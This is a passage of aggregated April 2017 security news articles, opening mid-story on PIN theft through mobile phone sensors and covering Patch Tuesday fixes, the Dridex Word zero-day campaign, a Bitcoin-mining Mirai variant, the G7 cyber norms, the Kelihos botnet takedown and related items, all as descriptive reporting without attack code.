"But because mobile apps and websites don't need to ask permission to access most of them, malicious programs can covertly 'listen in' on your sensor data and use it to discover a wide range of sensitive information about you such as phone call timing, physical activities and even your touch actions, PINs and passwords."
Video Demonstration of the Attack

 

Scientists have even demonstrated an attack that can record data from around 25 sensors in a smartphone. They have also provided a video demonstration of their attack, showing how their malicious script is collecting sensor data from an iOS device.
The team wrote a malicious Javascript file with the ability to access these sensors and log their usage data. This malicious script can be embedded in a mobile app or loaded on a website without your knowledge.
Now all an attacker need is to trick victims into either installing the malicious app or visiting the rogue website.
Once this is done, whatever the victim types on his/her device while the malicious app or website running in the background of his phone, the malicious script will continue to access data from various sensors and record information needed to guess the PIN or passwords and then send it to an attacker's server.
Guessing PINs and Passwords with a High Degree of Accuracy
Researchers were able to guess four-digit PINs on the first try with 74% accuracy and on the fifth try with 100% accuracy based on the data logged from 50 devices by using data collected from just motion and orientation sensors, which do not require any special permission to access.
The scientists were even able to use the collected data to determine where users were tapping and scrolling, what they were typing on a mobile web page and what part of the page they were clicking on.
Researchers said their research was nothing but to raise awareness to those several sensors in a smartphone which apps can access without any permission, and for which vendors have not yet included any restrictions in their standard built-in permissions model.
"Despite the very real risks, when we asked people which sensors they were most concerned about we found a direct correlation between perceived risk and understanding," Mehrnezhad said. "So people were far more concerned about the camera and GPS than they were about the silent sensors."
Mehrnezhad says the team had alerted leading browser providers such as Google and Apple of the risks, and while some, including Mozilla and Safari, have partially fixed the issue, the team is still working with the industry to find an ideal solution.
More technical details can be found in the full research paper, titled "Stealing PINs via mobile sensors: actual risk versus user perception," published Tuesday in the International Journal of Information Security.


Adobe Patches Flash, Reader Flaws Exploited at Pwn2Own

12.4.2017 securityweek Vulnerebility
Adobe released security updates for several of its products on Tuesday to address a total of 59 vulnerabilities, including flaws disclosed last month at the Pwn2Own 2017 hacking competition.

A majority of the security holes, 47 to be precise, have been patched in the Windows and Mac versions of Adobe Acrobat and Reader. The vulnerabilities, rated critical with a priority rating of 2 (i.e. no exploits and exploitation not imminent), have been described as memory corruptions that could lead to arbitrary code execution or memory address leaks.

Seven critical vulnerabilities have been patched in Adobe Flash Player. The security holes are use-after-free and memory corruption issues that could lead to code execution.

Many of the flaws patched on Tuesday were reported to Adobe via Trend Micro’s Zero Day Initiative (ZDI), including several Reader and Flash Player vulnerabilities disclosed at ZDI’s Pwn2Own competition.

ZDI has published five advisories detailing the Pwn2Own security holes tracked as CVE-2017-3062, CVE-2017-3063, CVE-2017-3055, CVE-2017-3056 and CVE-2017-3057.

Adobe has also resolved vulnerabilities in Photoshop CC for Mac and Windows, Campaign, and the Creative Cloud Desktop Application for Windows. The company has found no evidence of exploitation in the wild.

Microsoft has also released patches for tens of vulnerabilities this Tuesday, including for zero-day flaws exploited in the wild.

One of the zero-days is CVE-2017-0199, an Office and WordPad vulnerability that has been exploited to deliver malware such as Dridex, WingBird, Latentbot and Godzilla. Another zero-day is CVE-2017-0210, a privilege escalation vulnerability affecting Internet Explorer.

The third zero-day impacts Office and it hasn’t actually been patched, but Microsoft did release a mitigation that should help reduce the risk of exploitation. This flaw has been exploited in limited, targeted attacks.


Microsoft Patches Office, IE Flaws Exploited in Attacks

12.4.2017 securityweek Vulnerebility
Microsoft’s security updates for April 2017 address more than 40 critical, important and moderate severity vulnerabilities, including three zero-day flaws that have been exploited in attacks.

According to Microsoft, the updates resolve flaws affecting Edge, Internet Explorer, Windows, Office, Visual Studio for Mac, .NET Framework, Silverlight and Adobe Flash Player components.

One of the zero-days patched by Microsoft this month is CVE-2017-0199, an Office and WordPad vulnerability that can be exploited for remote code execution. The security hole has been exploited in the wild by malicious actors to deliver various pieces of malware, including Dridex, WingBird, Latentbot and Godzilla.

Another vulnerability that has been actively exploited is CVE-2017-0210, a privilege escalation weakness affecting Internet Explorer. Microsoft said the flaw exists due to the lack of proper enforcement of cross-domain policies, and it can be exploited by tricking the targeted user into accessing a specially crafted web page. However, the company has not shared any information about the attacks it has been exploited in.

The third zero-day, an Office flaw which Microsoft says has been exploited in limited targeted attacks, has not been patched with this month’s updates. However, the company has released a mitigation that should help reduce the risk of exploitation until a patch is made available.

The issue, tracked by Microsoft with the identifier 2017-2605 (no CVE), is related to the Encapsulated PostScript (EPS) Filter in Office. The company’s mitigation turns off the EPS filter by default.

The list of critical flaws addressed on Tuesday also includes 13 bugs affecting Internet Explorer, Edge, .NET, Office and Hyper-V.

Microsoft has been transitioning from security bulletins to a database called Security Update Guide. The transition has now been completed – no security bulletins have been published this month – and while some users welcome the change, others said they liked the old format better.

“[The] Security Update Guide provides a number of nice filtering options, but you lose a bit of the organization,” said Chris Goettl, product manager with Ivanti. “For instance, to look at all CVEs that are resolved for a single update, you must now look at each individually where the bulletin page had them organized into one place. Likely, it will take a while for people to get used to.”

It’s also worth noting that this is the last round of security updates for Windows Vista, which has reached end of support.

Adobe patches tens of flaws across several products

Security updates released on Tuesday by Adobe patch nearly 60 vulnerabilities across several of the company’s products. The Acrobat and Reader updates address 47 flaws, including many that could lead to arbitrary code execution.

The rest of the security holes impact Flash Player, Photoshop CC for Mac and Windows, Campaign, and the Creative Cloud Desktop Application for Windows. Adobe has found no evidence of exploitation in the wild.


Microsoft Patch Tuesday fixes three flaws actively exploited in attacks in the wild
12.4.2017 securityaffairs Vulnerebility

Today Microsoft Patch Tuesday fixed the zero-day Word vulnerability that has been actively exploited in attacks in the wild.
Microsoft today patched the zero-day Word vulnerability that has been exploited in attacks in the wild. Just yesterday I wrote about a phishing campaign leveraging the flaw to deliver the Dridex banking Trojan.

Microsoft published security patches that addressed a total of 45 CVEs in nine products, including Internet Explorer, Microsoft Edge and Windows 10. Most of the updates address problems in Microsoft IE and Edge browsers.

The company confirmed that three of the vulnerabilities among this Tuesday updates are under active attack in the wild.

The first vulnerability actively exploited by attackers is tracked as CVE-2017-0199, it allowed attackers to use a specially-crafted document embedding an OLE2link object to spread malware such as the Dridex banking Trojan.

“While labelled as an Outlook issue, this is actually bug actually stems from an issue within RTF files. According to published reports, the exploit uses an embedded OLE2link object in a specially-crafted document. It should also be noted that these attacks can be thwarted by enabling Office’s Protective View feature. There are updates for both Office and Windows to be applied, and both should be considered necessary for complete protection.” reads the Patch Tuesday analysis by the Zero Day Initiative.

The second flaw exploited in the wild is an Internet Explorer elevation of privilege vulnerability tracked as CVE-2017-0210. The flaw could be exploited by attackers to access information from one domain and inject it into another domain.

“The exploit allows an attacker to access sensitive information from one domain and inject it into another domain, which could allow the attacker to gain elevated privileges. However, direct code execution is not possible through this bug alone. Instead, it would likely be used with a bug that executes code at a low integrity level to elevate the code execution to medium level integrity.” continues ZDI.

Microsoft published an the 2017-2605*: “Defense-in-Depth Update for Microsoft Office”, to address a flaw tracked as CVE-2017-2605. It is a Microsoft Office bug in the Encapsulated PostScript (EPS) filter in Office.

“According to Microsoft, they are aware of “limited targeted attacks” that take advantage of an unpatched vulnerability in the EPS filter. This temporary measure is being pushed out until a true fix is released. Issues like this used to be covered by Security Advisories, so perhaps this indicates Microsoft has chosen to do away with these as well.” states the analysis.

Microsoft did not issue an update to address this flaw, it opted to update Microsoft Office turning off, by default, the EPS filter in Office as a defense-in-depth measure.

Patch Tuesday

Microsoft also issued a fix for Windows 10 (Creators Update) that addresses several remote code execution and elevation of privilege flaws.

Giving a look at the list of the vulnerabilities fixed by this last Microsoft Patch Tuesday we can find:

CVE-2017-0201 IE RCE vulnerability ;
CVE-2017-0093 Edge scripting engine memory corruption vulnerability;
CVE-2017-0162, CVE-2017-0163, CVE-2017-0180 Hyper-V vulnerabilities;


The Mirai botnet is back and includes a Bitcoin Mining component
12.4.2017 securityaffairs BotNet

Experts at IBM X-Force security firm warn of a new Mirai Botnet implementing Bitcoin crypto-currency mining capabilities.
The Mirai botnet was first spotted in august 2016 by the security researcher MalwareMustDie, it was specifically designed to compromise vulnerable or poorly protected IoT. Once Mirai malware compromises an IoT device it recruits it into a botnet primarily used for launching DDoS attacks, such as the one that hit Dyn DNS service.

In October 2016, the Mirai source code was leaked and threat actors in the wild started customizing their Mirai botnet.

The last variant of the Mirai botnet spotted in the wild by IBM researchers implements further capabilities, it includes a component for Bitcoin mining.

It is not surprising, crooks always try to catch every opportunity and the value of the crypto-currency has doubled in price in the last months reaching more than $1,290 per unit a few weeks ago.

“This new variant of ELF Linux/Mirai malware with the bitcoin mining component has us pondering, though.” reads the analysis published by IBM X-Force security researchers. “Attackers certainly have much to gain from having bitcoins in their pocket to facilitate their cybercriminal activities — bitcoin is the currency of choice for purchasing illegal commodities such as malware.”

The new Bitcoin mining-capable Mirai botnet was involved in a short-lived, high-volume campaign at the end of March.

mirai botnet bitcoin

The malware targeted Linux machines running BusyBox, most of them are DVR servers with default Telnet credentials.

The new Mirai variant targets this specific category of IoT devices because it uses their computing power to mine Bitcoin.

“The new ELF Linux/Mirai malware variant we discovered included another add-on: a bitcoin miner slave. This led us to question the effectiveness of a bitcoin miner running on a simple IoT device that lacks the power to create many bitcoins, if any at all. Given Mirai’s power to infect thousands of machines at a time, however, there is a possibility that the bitcoin miners could work together in tandem as one large miner consortium.” continues IBM. “We haven’t yet determined that capability, but we found it to be an interesting yet concerning possibility. It’s possible that while the Mirai bots are idle and awaiting further instructions, they could be leveraged to go into mining mode.”

The experts at IBM found the Mirai dropper in a web console and detected the site it was associated in a series of high-volume command injection attacks.

The website was used by operators as a malware package archive repository, experts discovered that the file package also included a Dofloo backdoor and a Linux shell.


G7 DECLARATION ON RESPONSIBLE STATES BEHAVIOR IN CYBERSPACE
12.4.2017 securityaffairs BigBrothers

Presented the voluntary, non-binding norms of State behavior during peacetime in the G7 DECLARATION ON RESPONSIBLE STATES BEHAVIOR IN CYBERSPACE.
The risk of escalation and retaliation in cyberspace, the increasing number of cyber attacks and cyber threats even more sophisticated could have a destabilizing effect on international peace and security. The risk of conflict between states caused so cyber incidents encourages all States to engage in law-abiding, norm-respecting and confidence-building behavior in their use of ICT.

G7 DECLARATION ON RESPONSIBLE STATES BEHAVIOR IN CYBERSPACE

I’m very proud to share with you the G7 DECLARATION ON RESPONSIBLE STATES BEHAVIOR IN CYBERSPACE, I had the honor to be a member of the group that worked on the proposal for voluntary, non-binding norms of State behavior during peacetime. We presented 12 points aimed to propose stability and security in the cyberspace. The declaration invites all the States to collaborate with the intent to reduce risks to international peace, security, and stability.

Below the point presented in the Declaration:

Consistent with the purposes of the United Nations, including to maintain international peace and security, States should cooperate in developing and applying measures to increase stability and security in the use of ICTs and to prevent ICT practices that are acknowledged to be harmful or that may pose threats to international peace and security;
In case of ICT incidents, States should consider all relevant information, including the larger context of the event, the challenges of attribution in the ICT environment and the nature and extent of the consequences;
States should not knowingly allow their territory to be used for internationally wrongful acts using ICTs;
States should consider how best to cooperate to exchange information, assist each other, prosecute terrorist, and criminal use of ICTs and implement other cooperative measures to address such threats. States may need to consider whether new measures need to be developed in this respect;
States, in ensuring the secure use of ICTs, should respect Human Rights Council resolutions 20/8 and 26/13 on the promotion, protection and enjoyment of human rights on the Internet, as well as General Assembly resolutions 68/167 and 69/166 on the right to privacy in the digital age, to guarantee full respect for human rights, including the right to freedom of expression;
A State should not conduct or knowingly support ICT activity contrary to its obligations under international law that intentionally damages critical infrastructure or otherwise impairs the use and operation of critical infrastructure to provide services to the public;
States should take appropriate measures to protect their critical infrastructure from ICT threats, taking into account General Assembly resolution 58/199 on the creation of a global culture of cybersecurity and the protection of critical information infrastructures, and other relevant resolutions;
States should respond to appropriate requests for assistance by another State whose critical infrastructure is subject to malicious ICT acts. States should also respond to appropriate requests to mitigate malicious ICT activity aimed at the critical infrastructure of another State emanating from their territory, taking into account due regard for sovereignty;
States should take reasonable steps to ensure the integrity of the supply chain so that end users can have confidence in the security of ICT products. States should seek to prevent the proliferation of malicious ICT tools and techniques and the use of harmful hidden functions;
States should encourage responsible reporting of ICT vulnerabilities and share associated information on available remedies to such vulnerabilities to limit and possibly eliminate potential threats to ICTs and ICT-dependent infrastructure;
States should not conduct or knowingly support activity to harm the information systems of the authorized emergency response teams (sometimes known as computer emergency response teams or cybersecurity incident response teams) of another State. A State should 5 not use authorized emergency response teams to engage in malicious international activity.
No country should conduct or support ICT-enabled theft of intellectual property, including trade secrets or other confidential business information, with the intent of providing competitive advantages to companies or commercial sectors.
Let me thank the colleagues Luigi Martino and Marco Lapadura that worked with me at the declaration, and of course to Minister Gianfranco Incarnato that led the group of work.


Canada Court Denies Accused Yahoo Hacker Bail

12.4.2017 securityweek Crime
A Canadian court on Tuesday denied bail to a man accused of carrying out devastating cyberattacks on Yahoo as he awaits possible extradition to the United States to face criminal charges.

Karim Baratov, 22, an immigrant from Kazakhstan, was arrested on a US warrant in March for alleged hacking, commercial espionage and related crimes.

His lawyers said they will fight the extradition request. A hearing could begin as early as June and the process of deciding whether to extradite Baratov is expected to last up to three years.

US authorities alleged Russian intelligence agents hired Baratov and another hacker to carry out attacks on Yahoo from 2014 to 2016.

The data breach compromised 500 million Yahoo accounts and is one of the largest cyberattacks in history. Targets included Russian and US government officials, cyber security, diplomatic and military personnel, journalists, companies and financial firms.

Baratov's lawyers had asked that he be remanded into his parents' custody. His father vowed strict supervision at home, telling the court: "Jail would look like paradise."

But prosecutors said Baratov has ties to foreign spies and posed a flight risk, noting that one of his co-accused in the case fled to Russia. amc/dw


Mandatory Certificate Authority Authorization Checks Will Boost Domain Security

12.4.2017 securityweek Safety
The issuance of SSL/TLS (Secure Sockets Layer/Transport Layer Security) certificates is expected to become a more secure process this September, after the implementation of mandatory Certificate Authority Authorization (CAA) checks.

After Certificate Authorities (CAs) and browser makers voted last month to make CAA checking mandatory, the new standard will be implemented starting September 8, 2017, according to Ballot 187 on the CA/Browser Forum site. Starting then, all CAs will have to check CAA records at issuance time for all certificates, which should prevent them from issuing certificates if not permitted to.

CAA is a DNS Resource Record that “allows a DNS domain name holder to specify one or more Certification Authorities (CAs) authorized to issue certificates for that domain and, by implication, that no other CAs are authorized.”

Domain owners will be able to set an issuance policy that all publicly-trusted CAs should comply with, thus preventing CAs from wrongfully issuing HTTPS certificates. This new standard should also mitigate the issue that “the public CA trust system is only as strong as its weakest CA,” Ballot 187 also reveals.

CAs will have to check “for a CAA record for each dNSName in the subjectAltName extension of the certificate to be issued.” This standard, however, doesn’t prevent CAs to check CAA records at any other time.

Apparently, CAA checking isn’t required in specific scenarios, such as for “certificates for which a Certificate Transparency pre-certificate was created and logged in at least two public logs, and for which CAA was checked.”

If the CA or an Affiliate of the CA is the DNS Operator of the domain’s DNS, CAA checking becomes optional, the same as “for certificates issued by a Technically Constrained Subordinate CA Certificate as set out in Baseline Requirements section 7.1.5, where the lack of CAA checking is an explicit contractual provision in the contract with the Applicant.”

CAs are also required to document potential issuances that were prevented by the CAA, and should also send reports of the requests to the contact(s) stipulated in the CAA iodef record(s), if present.

17 out of 19 voting CAs (94%) voted in favor of the new CAA standard. All three participating browser makers (Mozilla, Google, and Apple) voted in favor.


Dridex Attacks Exploit Recent Office 0-Day

11.4.2017 securityweek Exploit
A recently revealed zero-day vulnerability in Microsoft Office is being exploited by the Dridex banking Trojan to compromise unsuspecting victims’ computers, Proofpoint security researchers warn.

Detailed recently by McAfee and FireEye, the zero-day allows an attacker to achieve code execution on compromised machines. Leveraging Office’s Object Linking and Embedding (OLE) functionality, an attacker could create a malicious RTF (Rich Text Format) document that links to an HTA (HTML Application) file hosted on remote servers, which in turn executes a malicious Visual Basic script.

According to Proofpoint, the vulnerability is currently being exploited in malicious documents that millions of recipients across various organizations primarily in Australia have received via email, and which eventually led to the Dridex Trojan being installed on the compromised system.

The campaign features messages supposedly coming from “<[device]@[recipient's domain]>”, where [device] could be “copier”, “documents”, “noreply”, “no-reply”, or “scanner.” All emails use “Scan Data” as subject line, while the attached Microsoft Word RTF document is named “Scan_xxxx.doc” or “Scan_xxxx.pdf.”

“Note that while this campaign does not rely on sophisticated social engineering, the spoofed email domains and common practice of emailing digitized versions of documents make the lures fairly convincing,” Proofpoint says.

When the malicious document is opened, the exploit carries out a series of operations that eventually result in Dridex botnet ID 7500 being installed on the victim’s system. The security researchers noticed that the exploit worked without user interaction: the system was compromised even if the user was presented a dialog about the document containing “links that may refer to other files.”

The particular instance of Dridex distributed as part of this infection campaign was observed using over 100 injects for known banks and for various other popular applications and online destinations.

“Although document exploits are being used less frequently in the wild, with threat actors favoring social engineering, macros, and other elements that exploit "the human factor," this campaign is a good reminder that actors will shift tactics as necessary to capitalize on new opportunities to increase the effectiveness of their efforts,” Proofpoint says.


Hackers Targeting Amazon Third-Party Sellers With Password Reuse Attacks

11.4.2017 securityweek Hacking
Cyber criminals are re-using stolen passwords to access the accounts of third-party sellers on Amazon. They then change the bank account details and simply redirect customer payments to their own bank accounts. Where they find an old and disused account, they promote non-existent deals with heavy discounts, and again divert the proceeds to their own bank account. It should be noted that this is not an attack against Amazon users, but against Amazon third-party sellers.

It would be wrong to say that Amazon is being hacked. Legitimate passwords are being used to access legitimate accounts. These passwords come from the billions of stolen passwords available on the internet. Where there is a fault, it is in users' continued tendency to use the same password across multiple accounts; and to rarely, if ever, change them.

The only real difficulty for the criminals is matching the stolen and reused password to the Amazon account -- and this is not hard. Since almost all services employ the user's email address as the username, it is merely a question of locating a third-party seller, finding the seller's email address, and trying the associated password from the list of stolen passwords. "The attackers are mining the rich seam of stolen credentials publicly dumped or traded in underground forums," ESET senior research fellow David Harley told SecurityWeek. "That way, they only need to match known credentials to Amazon account holders."

Even if the seller's email address is not known, it could possibly be obtained from Amazon itself. "If Amazon is the weak spot, perhaps the registration page?" suggested Sean Sullivan, security advisor at F-Secure. "The 'Create account' page looks like something that could be targeted with a list of addresses, from which could easily be noted those to result in a message of 'email is already in use'. Then you have addresses to try on the sign-in page."

The basic password problem was highlighted in a recent study by Thycotic, which found that even security professionals reuse passwords, use weak passwords, and don't change them over long periods of time. A password stolen from Yahoo years ago might well provide access to other accounts today -- including Amazon.

The result, according to the Wall Street Journal, is that some sellers are losing thousands of dollars. "CJ Rosenbaum, a New York-based lawyer who represents Amazon sellers, says that more than a dozen of his clients have recently called to tell him they were hacked, a number of whom lost about half of their monthly sales of $15,000 to $100,000. They are asking Amazon for their money back, Mr. Rosenbaum said."

WSJ also reports that "some sellers say the hacks have shaken their confidence in Amazon's security measures." This isn't entirely fair -- all users should do more to protect their passwords: strong, unique passwords that are regularly changed. And wherever possible, two-factor options should be employed.

"It is critical for Amazon resellers to take advantage of Amazon's two-factor authentication to prevent this type of hijacking and phishing activity," comments Sophos' principal research scientist Chet Wisniewski. "All Amazon users should take advantage of this feature, but considering what third party resellers have at risk it is even more important. The easiest method to enable uses a time-oriented token you can load for free on your Android or iOS smartphone. The most popular app to use for this is Google's Authenticator app." Sophos has its own option that can be installed on Android or iOS and enabled in the Amazon or AWS account.

This is not to say that Amazon could not do more to protect its customers. In the desire to make things as easy as possible for customers, services like Amazon (and including almost all services from other ecommerce sites to social networks) do not enforce good password practices. Two-factor authentication is rarely required, and users are not forced to change passwords regularly. The bottom line, however, is that users need to better understand how to generate strong, unique passwords; and to regularly change them.


OWASP Proposes New Vulnerabilities for 2017 Top 10

11.4.2017 securityweek Vulnerebility
OWASP Top 10 - 2017 RC1-English.pdf
The Open Web Application Security Project (OWASP) announced on Monday the first release candidate for the 2017 OWASP Top 10, which proposes two new vulnerability categories.

The new categories proposed for OWASP Top 10 - 2017 are “insufficient attack detection and prevention” and “unprotected APIs.”

OWASP wants to make room for the “unprotected APIs” category by dropping “unvalidated redirects and forwards,” the 10th item on the current (2013) list, which was added to the top 10 in 2010.

The new insufficient attack protection category would be added to the 7th position. OWASP wants to make room for it by merging the current 4th and 7th items, namely insecure direct object references with missing function level access control. The organization has proposed the merger of the two old categories into “broken access control”, as it was back in 2004.

OWASP top 10 2017

OWASP has provided the following description for the insufficient attack protection category: “The majority of applications and APIs lack the basic ability to detect, prevent, and respond to both manual and automated attacks. Attack protection goes far beyond basic input validation and involves automatically detecting, logging, responding, and even blocking exploit attempts. Application owners also need to be able to deploy patches quickly to protect against attacks.”

In a discussion on Reddit, several users said “insufficient attack protection” should not be classified as a flaw. It remains to be seen if enough users agree to make OWASP change its mind about creating a new category for it.

As for the unprotected APIs category, OWASP says, “Modern applications often involve rich client applications and APIs, such as JavaScript in the browser and mobile apps, that connect to an API of some kind (SOAP/XML, REST/JSON, RPC, GWT, etc.). These APIs are often unprotected and contain numerous vulnerabilities.”

Comments on the 2017 Top 10 proposal can be submitted via email until June 30 to OWASP-TopTen(at)lists.owasp.org, or dave.wichers(at)owasp.org (for private comments). The final version will be released in either July or August.


Mirai Variant Has Bitcoin Mining Capabilities

11.4.2017 securityweek IoT
A newly observed variant of the Mirai malware is abusing infected Internet of Things (IoT) devices for Bitcoin crypto-currency mining, IBM X-Force security researchers warn.

Initially spotted in September last year, Mirai was designed to find insecure IoT devices and ensnare them into a botnet primarily used for launching DDoS (distributed denial of service) attacks. Variants of the malware started to emerge after the Trojan’s source code was leaked, and a Windows variant designed to spread the Linux version was spotted earlier this year.

The newest variant moves beyond the initial DDoS capabilities of the botnet, with the addition of a component focused on Bitcoin mining. This crypto-currency has doubled in price over the past half year, trading at more than $1,290 per unit this March, above the November 2013 high of $1,242.

The Bitcoin mining-capable Mirai variant was observed in a short-lived, high-volume campaign at the end of March, targeting Linux machines running BusyBox. The attack focuses on devices such as DVR servers, which usually feature BusyBox with default Telnet credentials that Mirai targets with a dictionary attack brute-force tool.

In addition to the various types of attacks that Mirai bots can perform, such as TCP, UDP, and HTTP floods, the new variant also turns the compromised devices into Bitcoin miner slaves. Because IoT devices usually lack computing power, they can’t create Bitcoins, at least not on their own.

“Given Mirai’s power to infect thousands of machines at a time, however, there is a possibility that the bitcoin miners could work together in tandem as one large miner consortium. We haven’t yet determined that capability, but we found it to be an interesting yet concerning possibility. It’s possible that while the Mirai bots are idle and awaiting further instructions, they could be leveraged to go into mining mode,” IBM explains.

IBM researchers found the Mirai dropper in a web console and associated the site to a series of high-volume command injection attacks. They also determined that the website was used as a malware package archive repository and that it was also counting infected victims in real-time. What’s more, the file package also included a Dofloo backdoor and a Linux shell.

Mirai is only one of the malware families to have adopted crypto-currency mining lately, after the Sundown exploit kit started distributing a Monero miner several months ago. Last year, researchers discovered a Go-based Linux Trojan focused on Monero mining.


Cisco Finds Many Flaws in Moxa Industrial APs

11.4.2017 securityweek Vulnerebility 
Cisco’s Talos intelligence and research group has conducted a two-week analysis of an industrial wireless access point (AP) from Taiwan-based Moxa and discovered more than a dozen vulnerabilities, including ones that can be exploited to take full control of a device.

A blog post published by Talos on Monday describes the vulnerabilities found by researchers during their tests. All of the flaws have been addressed by Moxa, except for one critical weakness, whose details will not be disclosed until a patch becomes available.

Experts focused on Moxa’s AWK-3131A AP, which is recommended for any type of industrial wireless application.Moxa AP vulnerabilties

On the first day of testing, researchers identified the services available on the BusyBox-powered device, including SSH (Dropbear), Telnet, HTTP and HTTPS. Talos said Moxa agreed to share the source code of its BusyBox implementation for proper analysis.

Moxa AP vulnerabilties

Researchers first identified some authentication issues that made it easy for attackers to launch dictionary attacks against the web interface’s login page, and flaws that allowed hackers to hijack user sessions.

On the third day of the investigation, researchers discovered many cross-site scripting (XSS) vulnerabilities in the front-end of the web interface. These flaws can be exploited to hijack user sessions and gain access to the web interface.

Once they are authenticated, attackers can exploit one of the several command injection vulnerabilities in order to gain full control of the targeted AP.

Several of the security holes found by Talos can allow malicious actors to obtain potentially valuable information without any authentication, including passwords, firewall rules and network configuration data.

Experts have also uncovered a denial-of-service (DoS) vulnerability that can be exploited remotely to crash the web application.

On the last day of testing, researchers identified several cryptography-related issues. Specifically, they determined that the Moxa AP used an outdated version of OpenSSL (1.0.0d from 2011) and it had been vulnerable to attacks such as POODLE and DROWN.

“Our research demonstrates how many vulnerabilities can be quickly discovered by analyzing a device,” Talos researchers said. “There is nothing to suggest that this device is more or less vulnerable than any other. Indeed, the vulnerabilities we discovered are exactly the types of vulnerabilities likely to be discovered on any ICS device.”


U.S. Takes Down Kelihos Botnet After Its Russian Operator Arrested in Spain
11.4.2017 thehackernews BotNet
A Russian computer hacker arrested over the weekend in Barcelona was apparently detained for his role in a massive computer botnet, and not for last year's US presidential election hack as reported by the Russian media.
Peter Yuryevich Levashov, 32-years-old Russian computer programmer, suspected of operating the Kelihos botnet — a global network of over 100,000 infected computers that was used to deliver spam, steal login passwords, and infect computers with ransomware and other types of malware since approximately 2010, the U.S. Justice Department announced Monday.
As suspected earlier, Levashov, also known as Peter Severa, is the same man who has also been listed in the World's Top 10 Worst Spammers maintained by anti-spam group Spamhaus, which has given him the 7th position in the list.
The arrest was made possible after the FBI learned just last month that Levashov was traveling with his family to Spain from his home in Russia, a country without any extradition treaty to the United States.
Initially, it was believed that Levashov was detained on suspicion of 2016 US election hack, after his wife told Russian publication RT that authorities said her husband’s apprehension was in part due to his involvement in the U.S. election hacking, including the notorious breach of the Democratic National Committee (DNC).
However, the DoJ press release indicates no link between Levashov and US election hack at all.
Instead, Levashov was linked to the Kelihos botnet by the FBI because he used the same IP address to operate the botnet that he used to access his email and other online accounts in his name, including Apple iCloud and Google Gmail accounts.
According to the indictment unsealed Monday, Levashov operated the botnet since 2010, targeting Microsoft Windows machines for infection. He allegedly used Kelihos to distribute hundreds of millions of spam emails per year, and pump-and-dump stock scams.
Besides conducting spamming operations, prosecutors also alleged Levashov also used the Kelihos botnet to infect end-user computers with malware and harvest passwords to online and bank accounts belonging to thousands of Americans.
"The ability of botnets like Kelihos to be weaponized quickly for vast and varied types of harms is a dangerous and deep threat to all Americans, driving at the core of how we communicate, network, earn a living, and live our everyday lives," said Acting Assistant Attorney General Blanco.
"Our success in disrupting the Kelihos botnet was the result of strong cooperation between private industry experts and law enforcement, and the use of innovative legal and technical tactics."
The FBI officials obtained court orders (Rule 41 of the Federal Rules of Criminal Procedure) to redirect Kelihos-infected PCs to servers operated by authorities — a process known as "Sinkhole attack" — and to block any attempts by the botnet to regain control of those sinkholed computers.
The FBI said it worked with security firm CrowdStrike and Shadowserver Foundation, a volunteer group of information security experts, to deploy the sinkhole attack to disconnect communications between criminals and infected computers.
Levashov has been charged with wire fraud and unauthorized interception of electronic communications. The government is now seeking his extradition to the United States.


Unpatched Microsoft Word Flaw is Being Used to Spread Dridex Banking Trojan
11.4.2017 thehackernews Vulnerebility
If you are a regular reader of The Hacker News, you might be aware of an ongoing cyber attack — detected in the wild by McAfee and FireEye — that silently installs malware on fully-patched computers by exploiting an unpatched Microsoft Word vulnerability in all current versions of Microsoft Office.
Now, according to security firm Proofpoint, the operators of the Dridex malware started exploiting the unpatched Microsoft Word vulnerability to spread a version of their infamous Dridex banking trojan.
Dridex is currently one of the most dangerous banking trojans on the Internet that exhibits the typical behavior of monitoring a victim's traffic to bank sites by infiltrating PCs and stealing victim's online banking credentials and financial data.
The Dridex actors usually relied on macro-laden Word files to distribute the malware through spam messages or emails.
However, this is the first time when researchers found the Dridex operators using an unpatched zero-day flaw in Microsoft Word for distributing their banking trojan.

According to a blog post published Monday night by Proofpoint, the latest Dridex spam campaign is delivering Word documents weaponized with this zero-day to millions of recipients across several organizations, including banks primarily located in Australia.
"Emails in this campaign used an attached Microsoft Word RTF (Rich Text Format) document. Messages purported to be from "[device]@[recipient's domain]." [Device] may be "copier", "documents", "noreply", "no-reply", or "scanner"," Proofpoint researchers say.
"The subject line in all cases read "Scan Data" and included attachments named "Scan_123456.doc" or "Scan_123456.pdf", where "123456" was replaced with random digits...the spoofed email domains and the common practice of emailing digitized versions of documents make the lures fairly convincing."
As we reported on Saturday, this zero-day flaw is severe because it gives hackers power to bypass most exploit mitigations developed by Microsoft, and unlike past Word exploits seen in the wild, it doesn't require victims to enable Macros.
Moreover, given the danger of Dridex – also known as Bugat and Cridex – banking trojan, people are strongly advised not to open Word documents attached to an email from anyone, even if you know the sender until Microsoft releases a patch.
Microsoft knew of the flaw very long ago
According to researchers at McAfee and FireEye, Microsoft has known of the remote code flaw since January and could release a patch for the vulnerability today, as part of its regular Patch Tuesday routine.
However, an independent security researcher Ryan Hanson claimed that he discovered this 0-day, along with the two other flaws, in July and reported it to Microsoft in October 2016.
"The initial discovery was in July, which was followed up by additional research and the identification of a protected view bypass vulnerability. Those two bugs and an additional Outlook bug were submitted to MS in October," Hanson told The Hacker News.
"There may very well be additional HTA related vectors in Office, but based on the detail provided by McAfee, the vulnerability they've identified functions exactly like the one I disclosed. The only difference I see is the VBScript payload, since my payload simply executed calc.exe."
If the claims made by Hanson is true and his reported vulnerability is the same being used in the wild to spread Dridex, Microsoft left its customers vulnerable to the attacks even after being known of the critical flaw for quite long.
Enable 'Protected View' in Microsoft Office to Prevent Attack
Since the attack does not work when a malicious document is viewed in Office Protected View, users are advised to enable this feature in order to view any Office documents.
For more technical details about the latest Dridex malware campaign exploiting the unpatched Microsoft Word flaw, you can head on to the blog post published by Proofpoint.


WikiLeaks CIA Files Linked to Espionage Group

11.4.2017 securityweek  BigBrothers

Researchers at Symantec have analyzed the Vault 7 files published in recent weeks by WikiLeaks and determined that they are very similar to ones used by a cyberespionage group tracked by the security firm as “Longhorn.”

The Vault 7 leaks cover exploits and tools allegedly used by the U.S. Central Intelligence Agency (CIA) to hack a wide range of systems, including PCs, Macs, mobile devices and IoT products. Based on an analysis of the files, Symantec is fairly confident that some of the Vault 7 documents describe the tools and techniques used by Longhorn.

According to the security firm, Longhorn is a threat group that has been around since at least 2011, but possibly as early as 2007. Symantec has been tracking the APT since 2014, when it used a Windows zero-day exploit (CVE-2014-4148) to deliver a backdoor called Plexor.

